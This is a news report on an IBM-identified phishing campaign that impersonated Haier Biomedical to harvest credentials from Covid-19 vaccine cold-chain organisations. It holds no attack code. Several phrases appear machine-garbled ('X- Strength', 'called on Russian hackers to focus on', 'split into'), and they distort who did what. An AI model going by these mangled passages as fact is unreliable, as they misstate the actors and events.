Since the Covid-19 pandemic has begun, hackers and crooks have paid extraordinary attention to it, whether for espionage or fraud. Now, as pharmaceutical companies prepare to ship long-awaited vaccines, a new round of sophisticated phishing attacks focus on the complex supply chain this will bring them to those in need.
Two of the main Covid-19 vaccine candidates, by Pfizer and Moderna, have been submitted to the FDA for emergency clearance; the agency is due to review Pfizer’s app on December 10 and Moderna’s a week later. British regulators approved Pfizer’s vaccine on Wednesday. Which means the next challenge for both vaccines is transporting them. They must be stored at freezing temperatures – minus 4 degrees Fahrenheit for Moderna and 94 degrees lower for Pfizer – requiring a network of specialists known as the “cold chain.” Today, IBM security researchers are publish results that a campaign has been targeting a significant number of these companies for months in six different countries.
“This activity took place in September, which means that someone is looking to move forward, looking to be where they need to be at the critical moment,” says Claire Zaboeva, senior cyber threat analyst at IBM Security X- Strength. “This is the first time that we have seen this level of pre-positioning in the context of the pandemic.”
The campaign appears to have focused on businesses and organizations associated with Gavi, the Vaccine Alliance’s Cold chain equipment optimization platform, an effort to rationalize and strengthen the cold chain. The only IBM target identified by name was the European Commission’s Directorate-General for Taxation and Customs Union, which, among other things, determines tax break associated with transporting vaccines across borders. Apparently, any element of the cold chain was within reach of the attackers. Other targets mentioned by IBM include manufacturers of solar panels, which could power trucks carrying the vaccine to more remote locations, and a German website developer whose clients include pharmaceutical, biotech and container shipping companies. .
The attackers sent emails claiming to be from Haier Biomedical, a Chinese company that claims to be “the world’s only full cold chain supplier”, under the guise of routine quote requests. The emails contained HTML attachments that asked the recipient to enter their credentials, which hackers could then harvest to infiltrate the targeted company.
IBM says it doesn’t know if any of the attacks were successful or what the campaign’s ultimate goal might be. “The door is really open,” Zaboeva says. “Once you’ve got the keys to the kingdom, and you’re inside the city walls or on the network, there are a myriad of goals you can achieve, whether it’s critical information – such as schedules and distribution – or disruptive attacks.
In a way, the attacks are just an evolution of what Covid-19 researchers have already been facing for months. In July, US, UK and Canadian officials called on Russian hackers to focus on vaccine development. China also has been involved in an attempt against Moderna this summer. Just this week The Wall Street Journal reported that apparent North Korean hackers attempted to split into nine healthcare organizations, including pharmaceutical giants Johnson & Johnson and AstraZeneca.
The sustained cyberattack on businesses and organizations working on Covid-19 research and vaccines is not surprising, given the stakes. While not unexpected, this shift in focus towards the cold chain is of particular concern, given the sensitive and urgent nature of vaccine deployment.
“As we move towards the distribution of a vaccine for Covid-19, the logistics of this operation will become extremely critical,” said John Hultquist, senior director of analysis at Mandiant Threat Intelligence. “Seemingly trivial security concerns could have major repercussions on such a complex and important effort.”